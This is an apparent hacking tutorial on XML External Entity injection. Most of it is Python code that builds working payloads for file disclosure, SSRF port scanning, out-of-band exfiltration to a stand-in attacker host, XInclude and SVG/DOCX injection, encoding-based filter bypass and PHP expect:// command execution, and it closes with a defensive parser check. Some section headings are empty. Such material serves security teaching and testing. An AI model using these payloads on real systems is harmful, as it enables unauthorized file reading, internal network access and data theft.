XML: The Trojan Horse of Data Formats
XML was supposed to be a universal data exchange format. What could possibly go wrong with a language that lets you define your own tags? Well, it turns out XML has a feature called "external entities" that was designed for convenience but became one of the most dangerous vulnerability classes in web security.
XXE (XML External Entity) injection allows attackers to interfere with how an application processes XML data. At a minimum, a vulnerable parser lets you read files from the server. It can also be turned into server-side request forgery (SSRF) and internal port scanning, and in some configurations (for example PHP with the expect wrapper enabled) it leads to remote code execution.
XML Basics for Hackers
Before we break XML, let's understand what makes it tick. XML supports a DTD (Document Type Definition), which defines the structure of the document and can also declare entities, including external ones that point at files or URLs.
Basic XML Structure
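As a minimal sketch of what a well-formed document looks like, the snippet below parses one with Python's standard `xml.etree.ElementTree`. The `user`, `name` and `role` elements are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: an XML declaration, one root element with an
# attribute, and two child elements.
BASIC_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<user id="42">
  <name>alice</name>
  <role>admin</role>
</user>"""

root = ET.fromstring(BASIC_XML)
# Map each child tag to its text content.
summary = {child.tag: child.text for child in root}
print(root.tag, root.attrib, summary)
```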
Internal Entities (Safe-ish)
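An internal entity is a named piece of replacement text declared inside the DTD. The sketch below, with a made-up `author` entity, shows the parser substituting it. The "safe-ish" caveat is that deeply nested internal entities can still be abused for denial of service.

```python
import xml.etree.ElementTree as ET

# The value of the entity lives inside the document itself,
# so nothing is fetched from disk or the network.
INTERNAL_ENTITY_XML = b"""<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY author "alice">
]>
<note>Written by &author;</note>"""

def expand_internal(doc: bytes) -> str:
    """Parse the document and return the root element's text."""
    return ET.fromstring(doc).text

print(expand_internal(INTERNAL_ENTITY_XML))
```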
External Entities (Dangerous!)
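An external entity uses the `SYSTEM` keyword to point at a URI instead of inline text. The sketch below declares one (the `/etc/hostname` target is only an example) and feeds it to Python's `xml.etree.ElementTree`, which is documented as not expanding external entities and raising `ParseError` instead. A vulnerable parser would substitute the file's contents.

```python
import xml.etree.ElementTree as ET

# SYSTEM tells the parser to load the entity value from a URI.
EXTERNAL_ENTITY_XML = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data>&xxe;</data>"""

def try_parse(doc: bytes) -> str:
    """Report whether the parser expanded or refused the entity."""
    try:
        return "expanded: " + (ET.fromstring(doc).text or "")
    except ET.ParseError as exc:
        return f"blocked: {exc}"

print(try_parse(EXTERNAL_ENTITY_XML))
```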
Types of XXE Attacks
1. Classic XXE (File Disclosure)
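A classic payload declares an external entity that points at a local file and references it in an element the application echoes back. The helper below is a hypothetical sketch: `classic_xxe_payload` and the `data` root tag are assumptions, and a real target would need its own element names.

```python
def classic_xxe_payload(path: str, root_tag: str = "data") -> str:
    """Build a file-disclosure payload for an absolute file path."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root_tag} [\n'
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        ']>\n'
        # The reference must sit in a field that is reflected in the response.
        f'<{root_tag}>&xxe;</{root_tag}>'
    )

print(classic_xxe_payload("/etc/passwd"))
```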
2. XXE to SSRF
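Swapping the file path for a URL makes the server issue the request on your behalf. The sketch below assumes hypothetical helper names and an internal host `10.0.0.5`. Cloud metadata services such as `http://169.254.169.254/` are a common target for the same trick.

```python
def ssrf_payload(url: str) -> str:
    """Build a payload whose entity makes the parser fetch a URL."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [\n'
        f'  <!ENTITY xxe SYSTEM "{url}">\n'
        ']>\n'
        '<data>&xxe;</data>'
    )

def port_scan_payloads(host: str, ports: list[int]) -> dict[int, str]:
    """One payload per port; timing or error differences hint at open ports."""
    return {port: ssrf_payload(f"http://{host}:{port}/") for port in ports}

for port, payload in port_scan_payloads("10.0.0.5", [22, 80, 8080]).items():
    print(port, payload.splitlines()[2].strip())
```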
3. Blind XXE (Out-of-Band)
When the XML response doesn't include your entity value, you need to exfiltrate data through out-of-band channels:
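One common way to do this is to host a DTD that reads a file into a parameter entity and then builds a second entity whose URL carries the file contents to your server. The sketch below assumes a hypothetical attacker host `attacker.example`. Single-line files tend to work best because newlines can break the callback URL.

```python
def oob_dtd(target_path: str, callback_url: str) -> str:
    """DTD to host on the attacker's server (names are illustrative)."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        # &#x25; is an encoded '%', so the inner declaration is only
        # parsed once %wrap; is expanded.
        f'<!ENTITY % wrap "<!ENTITY &#x25; send SYSTEM \'{callback_url}?d=%file;\'>">\n'
        '%wrap;\n'
        '%send;\n'
    )

def oob_payload(dtd_url: str) -> str:
    """XML sent to the target; it only pulls in the external DTD."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [\n'
        f'  <!ENTITY % ext SYSTEM "{dtd_url}">\n'
        '  %ext;\n'
        ']>\n'
        '<data>x</data>'
    )

print(oob_dtd("/etc/hostname", "http://attacker.example/collect"))
print(oob_payload("http://attacker.example/evil.dtd"))
```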
4. Error-Based XXE
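Error-based XXE relies on the parser including the failing URI in its error message. A rough sketch, assuming the application shows parser errors: the DTD loads a file into a parameter entity and then references a path that cannot exist, with the file contents embedded in it. The helper name and the `/nonexistent/` prefix are illustrative.

```python
def error_dtd(target_path: str) -> str:
    """DTD that tries to leak a file through a 'file not found' error."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        # The bogus path embeds %file;, so a verbose error may echo the data.
        '<!ENTITY % wrap "<!ENTITY &#x25; err SYSTEM '
        "'file:///nonexistent/%file;'>\">\n"
        '%wrap;\n'
        '%err;\n'
    )

print(error_dtd("/etc/passwd"))
```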
5. XInclude Attacks
When you can't control the DOCTYPE but can inject into XML content:
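An XInclude payload needs no DOCTYPE at all, just an element in the XInclude namespace. The sketch below builds such a fragment (the `foo` wrapper and helper name are assumptions) and parses it locally to confirm it is well-formed. Whether the target resolves the include depends on its parser having XInclude processing enabled.

```python
import xml.etree.ElementTree as ET

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

def xinclude_fragment(path: str) -> str:
    """Fragment to place inside a value that ends up in server-side XML."""
    return (
        f'<foo xmlns:xi="{XINCLUDE_NS}">'
        # parse="text" asks for the raw file, so it need not be valid XML.
        f'<xi:include parse="text" href="file://{path}"/>'
        '</foo>'
    )

fragment = xinclude_fragment("/etc/passwd")
include = ET.fromstring(fragment)[0]
print(include.tag, include.attrib)
```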
Finding XXE Vulnerabilities
XXE Hunting Process
Look for XML input:
- File uploads (DOCX, XLSX, SVG are XML-based!)
- API endpoints accepting XML
- SOAP web services
- RSS/Atom feed parsers
- Config file uploads
Test entity handling:
- Submit XML with a harmless internal entity
- If it expands, external entities might work too
Escalate to external entities:
- Try file:// protocol to read local files
- Try http:// to detect outbound connections
Fall back to blind detection:
- If no direct output, use out-of-band detection
- Host an external DTD on your server
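The first test in that process, a harmless internal entity, can be sketched as follows. The helper names are hypothetical and no request is sent here: you would submit the payload yourself and pass the response body to the checker.

```python
import secrets

def build_probe(root_tag: str = "data") -> tuple[str, str]:
    """Return (marker, payload) for a harmless internal-entity probe."""
    marker = "xxe" + secrets.token_hex(4)  # unique, easy to spot in output
    payload = (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root_tag} [ <!ENTITY probe "{marker}"> ]>\n'
        f'<{root_tag}>&probe;</{root_tag}>'
    )
    return marker, payload

def looks_expanded(response_body: str, marker: str) -> bool:
    """True if the marker came back and the raw reference did not."""
    return marker in response_body and "&probe;" not in response_body

marker, payload = build_probe()
print(payload)
```

If `looks_expanded` returns True for the real response, the parser processes DTDs and the external-entity steps are worth trying next.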
Hidden XML Entry Points
Exploitation Techniques
File Reading
SSRF via XXE
Blind XXE with External DTD
SVG XXE
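Because SVG is XML, an image upload can carry the same DOCTYPE trick. The sketch below assumes the server renders or re-serializes the SVG so that the `<text>` content becomes visible. The dimensions and helper name are arbitrary.

```python
def svg_xxe(path: str) -> str:
    """Build an SVG whose text element references an external entity."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE svg [\n'
        f'  <!ENTITY xxe SYSTEM "file://{path}">\n'
        ']>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" width="400" height="60">\n'
        # If the renderer expands the entity, the file shows up in the image.
        '  <text x="10" y="40" font-size="14">&xxe;</text>\n'
        '</svg>'
    )

print(svg_xxe("/etc/hostname"))
```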
XLSX/DOCX XXE
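DOCX and XLSX files are ZIP archives of XML parts, so a payload can be planted by rewriting one part and re-zipping. The sketch below is a simplified illustration: `inject_xxe` is a hypothetical helper, `marker` is text you typed into the document beforehand, and the part name (for example `word/document.xml`) is passed in by the caller.

```python
import io
import zipfile

def inject_xxe(archive: bytes, part: str, path: str, marker: str) -> bytes:
    """Return a copy of the archive with an XXE payload in one XML part."""
    # Non-validating parsers do not check the DOCTYPE name against the root.
    doctype = f'<!DOCTYPE x [ <!ENTITY xxe SYSTEM "file://{path}"> ]>'
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            data = src.read(name)
            if name == part:
                # Swap the visible marker text for the entity reference.
                text = data.decode("utf-8").replace(marker, "&xxe;")
                if text.startswith("<?xml"):
                    # The DOCTYPE has to follow the XML declaration.
                    head, sep, tail = text.partition("?>")
                    text = head + sep + doctype + tail
                else:
                    text = doctype + text
                data = text.encode("utf-8")
            dst.writestr(name, data)
    return out.getvalue()
```

Usage would look like `inject_xxe(open("report.docx", "rb").read(), "word/document.xml", "/etc/passwd", "MARKER")`, where `report.docx` is a file of your own.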
Bypassing XXE Protections
Encoding Bypasses
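Filters that look for byte strings such as `<!DOCTYPE` or `SYSTEM` often assume UTF-8, while XML parsers also accept UTF-16. A minimal sketch of re-encoding a payload, using a harmless internal entity so it can be parsed locally (the helper name is an assumption):

```python
import xml.etree.ElementTree as ET

def to_utf16(payload: str) -> bytes:
    """Re-encode a payload as UTF-16 with a matching XML declaration."""
    body = payload
    if body.startswith("<?xml"):
        # Drop the old declaration so the encoding label stays truthful.
        body = body[body.index("?>") + 2:].lstrip()
    return ('<?xml version="1.0" encoding="UTF-16"?>\n' + body).encode("utf-16")

sample = '<?xml version="1.0"?>\n<!DOCTYPE data [<!ENTITY a "ok">]>\n<data>&a;</data>'
encoded = to_utf16(sample)
# The ASCII keyword no longer appears as a contiguous byte sequence,
# yet the parser still understands the document.
print(b"<!DOCTYPE" in encoded, ET.fromstring(encoded).text)
```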
Protocol Alternatives
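When `file://` or `http://` is filtered, other URI schemes may still be resolved, depending on the platform. The table below is a hedged sketch rather than a complete list: `php://filter` and `expect://` only exist on PHP (the latter needs the expect extension), and support for `ftp://` varies by parser.

```python
# Scheme templates; availability depends on the target's language and parser.
SCHEME_TEMPLATES = {
    "file": "file://{target}",
    "ftp": "ftp://{target}",
    # PHP only: base64-encodes the file so binary or XML content survives.
    "php_filter": "php://filter/convert.base64-encode/resource={target}",
    # PHP with the expect extension: runs {target} as a command.
    "expect": "expect://{target}",
}

def entity_decl(scheme: str, target: str) -> str:
    """Return an external entity declaration using the chosen scheme."""
    uri = SCHEME_TEMPLATES[scheme].format(target=target)
    return f'<!ENTITY xxe SYSTEM "{uri}">'

for scheme, target in [("file", "/etc/passwd"), ("php_filter", "/etc/passwd"), ("expect", "id")]:
    print(entity_decl(scheme, target))
```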
Parameter Entities When Regular Blocked
Key Takeaways
- XXE exploits XML's external entity feature to read files, make HTTP requests (SSRF), and more
- The DTD is the attack surface: look for <!DOCTYPE and <!ENTITY declarations
- Hidden XML formats: DOCX, XLSX, SVG, SOAP, RSS/Atom are all potential XXE vectors
- Blind XXE uses parameter entities and external DTDs to exfiltrate data out-of-band
- Defense: Disable DTD processing and external entities in your XML parser configuration
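The defense can be sketched with Python's standard library alone: reject any document that carries a DOCTYPE before handing it to the real parser. This is an illustration of the idea, not a drop-in fix. `DTDForbidden` and `safe_fromstring` are made-up names, and in practice you would usually rely on your parser's own settings or a hardened library such as defusedxml.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class DTDForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""

def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this as soon as it sees <!DOCTYPE ...>.
    raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

def safe_fromstring(data: bytes) -> ET.Element:
    """Parse XML only if it contains no DTD at all."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)  # raises DTDForbidden on any DOCTYPE
    return ET.fromstring(data)

print(safe_fromstring(b"<order><id>7</id></order>").find("id").text)
try:
    safe_fromstring(b'<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>')
except DTDForbidden as exc:
    print("rejected:", exc)
```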